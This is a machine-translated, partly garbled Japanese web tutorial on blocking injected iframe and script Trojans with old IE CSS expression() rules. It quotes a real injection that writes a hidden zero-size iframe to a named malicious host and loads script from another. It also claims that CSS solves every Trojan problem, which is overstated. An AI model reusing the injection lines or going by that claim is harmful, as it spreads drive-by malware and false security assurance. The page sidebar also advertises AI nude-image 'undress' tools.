検索
ホームページウェブフロントエンドjsチュートリアルすべての Web ページの Trojans_JavaScript スキルを解決する 2 行のコード
すべての Web ページの Trojans_JavaScript スキルを解決する 2 行のコード
WBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWB
WBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWB
May 16, 2016 pm 07:05 PM
解決

少し前に、あるコード行で iframe マルウェアの問題 (サーバー側のインジェクション、クライアント側の ARP インジェクションなど) が解決されました。これは、確かに風雨を避ける良い方法であると認識していました。しかし、今では、インターネット トロイの木馬をハングアップする方法が本当に変わりました。最近では、「スクリプト」トロイの木馬をハングアップするのが一般的です。私は、このようなサイトをいくつか見たことがあります。ページが追加されました:

注意、次のアドレスにはトロイの木馬が含まれています。簡単にアクセスしないでください:








汗だくなので、同じものを N 個続けて挿入しました。 <script> タグ。私のコンピュータにはパッチが適用されているので、この http://vccd.cn に直接アクセスして (または Thunder を使用して直接ダウンロードして)、次のように表示されました: <BR><br>document.write("<div style=' display :none'>") <br>document.write("<iframe src=http://a.158dm.com/b1.htm?id=017 width=0 height=0> " ) <BR>document.write("") <BR>また、Thunder を使用してファイル http://a.158dm.com/b1.htm をダウンロードしました。一見すると、混乱しているように見えました。汗、でも QQ 番号に似た番号を見つけたので、カーンに直接調べてみると、オンライン競馬を提供する専門組織がありました。料金はかなり高いですよ! <BR><br>... <br>var Kfqq, Qqs="[color=Magenta]784378237[/color]"; qwfgsg="LLLL\XXXXXLD"; ) (以下に N 個の統計的な JS コードがあります) <BR> 上記の状況については、無駄に無視することはできません、兄さん、方法を考えてください。緑豆のお粥を食べましたが、砂糖がたっぷり入っていて美味しかったです。ある方法を考えました。ちょっとした分析で答えが分かりました。 <script>トロイの木馬の特徴を見てみましょう: <BR><BR><script src=http://vccd.cn></script>

ところで、スクリプト トロイの木馬 src は通常、外部ドメインからのものです。つまり、src が自分の Web サイト上のスクリプトである場合は、通常、トロイの木馬の元の形式を確認する必要はありません。 iframe、JS コード、またはその他の code が出力される場合でも、その数に関係なく、それらが来るだけ kill されます。

一緒に CSS を書いて、1 つずつ取得してみましょう。

解決策 1:



コードをコピー コードは次のとおりです:
iframe{n1ifm:expression(this.src='about:blank',this .outerHTML ='');}/*このコード行は、IFRAME トロイの木馬のハングの問題を解決するためのものです*/
script{nojs1:expression((this.src.toLowerCase().indexOf('http')==0 ) ?document.write('トロイの木馬は正常に分離されました!'):'');}

原則: <script> でマークされた src を取り出して小文字に変換し、それが正しいかどうかを確認します。 「http」で始まる外部ドメインの JS スクリプト ファイルの場合、ページの内容が消去され、「トロイの木馬は正常に分離されました」と書き込まれます。それ以外の場合は通常通り表示されます。 <BR></script>
欠点: 訪問者は <script> トロイの木馬に感染したページを見ることができません。 <br><br>解決策 2: <br><br><br><br><div class="codetitle"><span>コードをコピーします<a style="CURSOR: pointer" data="41849" class="copybut" id="copybut41849" onclick="doCopy('code41849')"><U> コードは次のとおりです:iframe{nifm2:expression(this.src='about:blank',this.outerHTML='');} <div class="codebody" id="code41849">script{no2js:expression((this.src.toLowerCase().indexOf(' http') ==0)?document.close():'');} <BR><BR><BR>原則: document.close() を使用して、JS ファイルの document.write() を強制的に閉じます。外部ドメイン。トロイの木馬のコンテンツは書き込まれる時間がなく、その一部だけが強制的にキャッシュされて出力され、残りは再度書き込まれません 解決策 3: <BR><BR><br><br> <div class="codetitle"><span>コードをコピー<a style="CURSOR: pointer" data="19823" class="copybut" id="copybut19823" onclick="doCopy('code19823')"><U> コードは次のとおりです:iframe{ni3fm:expression(this.src='about:blank',this. externalHTML='');} <div class="codebody" id="code19823"> script{n3ojs:expression((this.src.toLowerCase().indexOf('http')==0)?document.execCommand('stop'):'');} <BR><BR><BR>原則: JS ファイルが外部ドメインに到着すると、IE のプライベート execCommand メソッドがすぐに呼び出され、そのページに対するすべてのリクエストが停止されるため、外部ドメインからの後続の JS ファイルのダウンロードも強制的に停止されます。ブラウザの「停止」ボタンをクリックするようなものです。これは JS が IE の停止ボタンをシミュレートする方法のようです。 <br><br>解決策4: <br><br><div class="codetitle"><span><a style="CURSOR: pointer" data="59344" class="copybut" id="copybut59344" onclick="doCopy('code59344')"><U>コードをコピー コードは次のとおりです:<div class="codebody" id="code59344"><BR>iframe{nif4m:expression(this.src='about:blank',this.outerHTML='');} <BR>script{noj4s:expression(if(this.src.indexOf('http')== 0 )this.src='res://ieframe.dll/dnserror.htm');} <BR><BR>原則: 外部ドメインの JS ファイルの src をローカルのアドレスに書き換えます。このような IE404 エラー ページでは、外部ドメインからの JS コードはダウンロードされません。 <br><br>解決策 5: <br><br><div class="codetitle"><span><a style="CURSOR: pointer" data="40781" class="copybut" id="copybut40781" onclick="doCopy('code40781')"><U>コードをコピーします コードは次のとおりです:<div class="codebody" id="code40781"><BR>iframe{nifm5:expression(this.src='about:blank',this.outerHTML='');} <BR>script{noj5s:expression((this.id.toLowerCase().indexOf(' lh') ==0)?document.write('トロイの木馬は正常に分離されました!'):''));} <BR><BR>5 番目のオプションでは、ページの HTML ソース コード <script&gt ; 次の「lh」は、lhWeatherJSapi などの接頭辞を付けて追加する必要があります。<script src="***/**.js" id="lhSearchJSapi"></script>

次のページ コードにはトロイの木馬のアドレスが含まれており、このトロイの木馬はページ上で 6 回繰り返されます。上記で説明したさまざまな解決策を使用してください。テストしてみてください! (このテストは危険です。必ずすべてのパッチを適用してください)

コードをコピーします コードは次のとおりです。





JS トロイの木馬プロセスを迅速に終了する CSS コード 🎜 >
私のテスト環境は次のとおりです:

Windows XP SP2 および Windows Vista SP1
IE6/IE7/IE8
にはすべてパッチが適用されています。

要約すると、現在のトロイの木馬の手法はすべて解読され、トロイの木馬の問題はすべて CSS で解決でき、訪問者は簡単に毒されることはなくなります。

皆さんも、私のコードにバグがないかどうか注意深く調べてください。バグがある場合は、問題を解決できるように必ず話し合ってください。または、他のより良い方法がある場合は、それについて話し合うことができます。

声明
この記事の内容はネチズンが自主的に寄稿したものであり、著作権は原著者に帰属します。このサイトは、それに相当する法的責任を負いません。盗作または侵害の疑いのあるコンテンツを見つけた場合は、admin@php.cn までご連絡ください。
関連記事
PHP Warning: mysqli_query(): Empty query的解决方法PHP Warning: mysqli_query(): Empty query的解决方法Jun 22, 2023 pm 04:45 PM

在使用PHP开发Web应用时,经常会遇到各种各样的问题。其中,一些常见的问题是与MySQL数据库相关的问题。有一种问题是“PHPWarning:mysqli_query():Emptyquery”的错误。本文将介绍此错误的原因以及解决方法。首先,让我们看看这个错误表示什么。当您使用mysqli_query函数执行MySQL查询时,如果该查询为空,则会

PHP Notice: Undefined property: stdClass::$的解决方法PHP Notice: Undefined property: stdClass::$的解决方法Jun 22, 2023 pm 10:24 PM

在使用PHP编写代码时,我们经常会看到这样的错误提示:“PHPNotice:Undefinedproperty:stdClass::$”。这个错误提示通常是由于在使用对象的属性时,该属性不存在而引起的。在本文中,我们将讨论如何解决这个问题。首先,我们需要了解这个错误提示的原因。当我们使用对象的属性时,PHP会首先检查该属性是否存在。如果该属性不存在,

PHP Fatal error: Cannot redeclare的解决方法PHP Fatal error: Cannot redeclare的解决方法Jun 22, 2023 pm 07:43 PM

在使用PHP进行开发的过程中,有时候会遇到“PHPFatalerror:Cannotredeclare”错误,这个错误通常会出现在如下情况:在PHP代码中多次include/require同一个文件。在代码中定义了和已有的函数/类重名的函数/类。这个错误会导致程序无法继续执行,为了解决这个问题,我们需要了解其产生原因和解决方法。产生原

PHP Warning: date() expects parameter 2 to be long, string given的解决方法PHP Warning: date() expects parameter 2 to be long, string given的解决方法Jun 22, 2023 pm 08:03 PM

在使用PHP程序开发时,经常会碰到一些警告或者错误的提示信息。其中,可能出现的一个错误提示就是:PHPWarning:date()expectsparameter2tobelong,stringgiven。这个错误的提示信息意思是:函数date()的第二个参数期望是长整型(long),但是实际传递给它的是字符串(string)。那么,我们

PHP Notice: Trying to get property ‘的解决方法’ of non-object的解决方法PHP Notice: Trying to get property ‘的解决方法’ of non-object的解决方法Jun 22, 2023 am 11:51 AM

当我们在使用PHP进行开发时,有时会遇到”Tryingtogetproperty‘的解决方法’ofnon-object”的错误提示。这个错误的原因一般是因为程序中对一个不存在或者未实例化的对象进行访问,导致了PHP解析器无法识别该对象的属性或方法。那么,如何解决这个错误呢?下面我将为大家介绍几种可能的解决方法。一、检查代码首先,我们需要将出错的代

TranslucentTB不起作用:如何解决TranslucentTB不起作用:如何解决Jun 06, 2023 am 08:21 AM

TranslucentTB是寻求时尚简约桌面外观的Windows11爱好者广泛使用的工具,遇到了障碍。自从发布以来Windows11内部版本22621.1344(22H2)28年2023月日,TranslucentTB对大多数用户不起作用。此错误使用户努力应对其任务栏的有限自定义选项。用户在寻求克服这一挫折的解决方案时,挫败感显而易见。在最近的Windows11更新之后,TranslucentTB无法正常工作的问题已在多个在线平台上广泛报道,包括论坛和社交媒体。用户一直在分享他们的经验,拼命寻找

PHP Notice: Undefined index:的解决方法PHP Notice: Undefined index:的解决方法Jun 22, 2023 am 10:15 AM

当使用PHP开发Web应用程序时,经常会遇到“PHPNotice:Undefinedindex:”这样的错误消息。此错误消息通常与数组相关。在PHP中,当我们使用未定义的数组索引时,就会收到这种类型的错误消息。这通常会发生在以下情况下:尝试访问不存在的数组元素尝试使用错误的键来访问数组在本文中,我们将探讨如何解决此错误,并提供一些常见的应用程序开发实践

PHP Notice: Undefined property: stdClass::$name的解决方法PHP Notice: Undefined property: stdClass::$name的解决方法Jun 22, 2023 pm 10:09 PM

在使用PHP开发项目时,经常会遇到各种警告和错误信息。其中,PHPNotice:Undefinedproperty:stdClass::$name是比较常见的一种警告提示。这种提示通常出现在尝试访问一个对象属性,但该属性并不存在的情况下。本文将介绍这种警告的解决方法。原因分析在PHP中,stdClass是一个类似于数组的标准类,在没有指定类的情况下创

See all articles

ホットAIツール

Undresser.AI Undress

Undresser.AI Undress

リアルなヌード写真を作成する AI 搭載アプリ

AI Clothes Remover

AI Clothes Remover

写真から衣服を削除するオンライン AI ツール。

Undress AI Tool

Undress AI Tool

脱衣画像を無料で

Clothoff.io

Clothoff.io

AI衣類リムーバー

AI Hentai Generator

AI Hentai Generator

AIヘンタイを無料で生成します。

もっと見る

人気の記事

R.E.P.O.説明されたエネルギー結晶と彼らが何をするか(黄色のクリスタル)
3週間前By尊渡假赌尊渡假赌尊渡假赌
R.E.P.O.最高のグラフィック設定
3週間前By尊渡假赌尊渡假赌尊渡假赌
アサシンのクリードシャドウズ:シーシェルリドルソリューション
1週間前ByDDD
R.E.P.O.誰も聞こえない場合はオーディオを修正する方法
3週間前By尊渡假赌尊渡假赌尊渡假赌
Atomfallのクレーンコントロールキーカードを見つける場所
1週間前ByDDD
もっと見る

ホットツール

ZendStudio 13.5.1 Mac

ZendStudio 13.5.1 Mac

強力な PHP 統合開発環境

SublimeText3 Linux 新バージョン

SublimeText3 Linux 新バージョン

SublimeText3 Linux 最新バージョン

MantisBT

MantisBT

Mantis は、製品の欠陥追跡を支援するために設計された、導入が簡単な Web ベースの欠陥追跡ツールです。 PHP、MySQL、Web サーバーが必要です。デモおよびホスティング サービスをチェックしてください。

AtomエディタMac版ダウンロード

AtomエディタMac版ダウンロード

最も人気のあるオープンソースエディター

mPDF

mPDF

mPDF は、UTF-8 でエンコードされた HTML から PDF ファイルを生成できる PHP ライブラリです。オリジナルの作者である Ian Back は、Web サイトから「オンザフライ」で PDF ファイルを出力し、さまざまな言語を処理するために mPDF を作成しました。 HTML2FPDF などのオリジナルのスクリプトよりも遅く、Unicode フォントを使用すると生成されるファイルが大きくなりますが、CSS スタイルなどをサポートし、多くの機能強化が施されています。 RTL (アラビア語とヘブライ語) や CJK (中国語、日本語、韓国語) を含むほぼすべての言語をサポートします。ネストされたブロックレベル要素 (P、DIV など) をサポートします。

もっと見る

ホットトピック

Gmailメールのログイン入り口はどこですか?
7432
15
CakePHP チュートリアル
1359
52
Steamのアカウント名の形式は何ですか
76
11
Win11 Activation Key Permanent
29
19
もっと見る